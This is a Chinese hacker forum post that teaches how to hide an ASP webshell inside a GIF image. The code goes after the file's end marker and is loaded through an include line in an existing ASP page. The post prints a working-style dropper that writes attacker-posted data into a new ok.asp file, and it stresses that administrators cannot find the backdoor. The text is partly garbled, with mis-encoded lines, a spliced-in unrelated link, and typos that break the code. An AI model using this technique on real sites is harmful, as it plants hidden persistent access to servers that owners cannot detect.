本文作者: 臭要飯的![BST]
如果要 作者信息和來源
Http://www.bugkidz.org
----------------------------------------
現在從注入拿WEBSHELL看來成功率都比較高了,
腳本后門的深入圖片中的后門
。拿到SHELL后,安裝自己的腳本后門,常常被查殺。
腳本后門的發(fā)展史:
1。最開始就是直接放一個ASP文件上去。
2。把ASP文件加密才放上去。
3。把腳本插入到代碼中去。(我經常用這種)
不過一樣被查得出來,我前段時候手工檢測一個站的腳本安全。
發(fā)現這個站被種了21個木馬。
所以我就想到了,怎么樣才能不被發(fā)現不能被查殺。
最后我研究了一下如果把腳本插入到圖片中。
然后在ASP中調用圖片中的腳本程序應該就可以了。
測試的時候通過了。
現在我把我的心德寫一下。
讓大家來分析一下。共同進步和完善這種方法。
在研究過程中我看了GIF圖片的結構文檔方面的書。
GIF圖片都是以 00 3B 為結束的。
換句話說00 3B 后面的不會顯示出來。
所以我們在00 3B后面插入代碼就行了。
當然代碼我們加密放到圖片中去效果更好。
我寫了一個程序來這么做。
這里要說一下,在圖片中00 3B后面的是不會顯示出來的。
但其中的代碼已經運行了。圖片也會正常顯示出來。
測試:
在圖片后面加入:<%=now%>
然后在一個ASP文件中加入:
然后你們下載這個圖片,發(fā)現圖片最后面變成了時間。很正常因為圖片放到了ASP腳本中運行了其中的代碼。
換句話來說,如果寫的是一段生成文件的腳本。
那么我們提交特定的參數讓圖片中的代碼去生成文件。
這樣就實現了我們的后門。
1:這種方法要做的工作就是在目標站點中找一張GIF圖片然后把代碼插入到圖片中,再上傳到站點中去。這樣作管理員很難找到木馬在哪里,
電腦資料
《腳本后門的深入圖片中的后門》(http://www.lotusphilosophies.com)。打死也想不到木馬在圖片中。2:我們插入的代碼只有一行就是那個include file .....
找個文件大點的ASP文件給插進去就行了。
然后我們在本地POST數據提交給ASP引用圖片的URL這樣就完成了工作。
我的插入圖片的腳本:
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set bjFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% fdata = request("cyfddata") %>
<% if fdata<>"" then %>
<% syfdpath=server.mappath(Request.ServerVariables("SCRIPT_NAME"))&"\ok.asp"%>
<% Set bjCountFile=objFSO.CreateTextFile(syfdapth,True) %>
<% objCountFile.Write fdata %>
<% end if %>
<% objCountFile.Close %>
<% Set bjCountFile=Nothing %>
<% Set bjFSO = Nothing %>
這段代碼主要就是在當前目錄下生成一個ok.asp文件。
文件內容是由我們提交的數據.用request("cyfddata")來獲取的。
這段代碼加密后插入到圖片中去。
下面我把我程序的代碼貼出來。(倒程序代碼沒有打包在里面。明天再貼上來)
現在給程序地址下載:
點這里下載測試程序。
本地自己構建一個提交表單向ASP文件提交(加入圖片那個文件)
表單文本框輸入內容名稱是:cyfddata
后感:
我本人認為這種方法,管理員很難查到。這是我兩天前想到的作出來了,
可能有些問題希望和大家一起討論,必競,為了追求技術就得研究技術。
共享知識,從而升華。
感覺去研究一些新東西,人活得更XS些。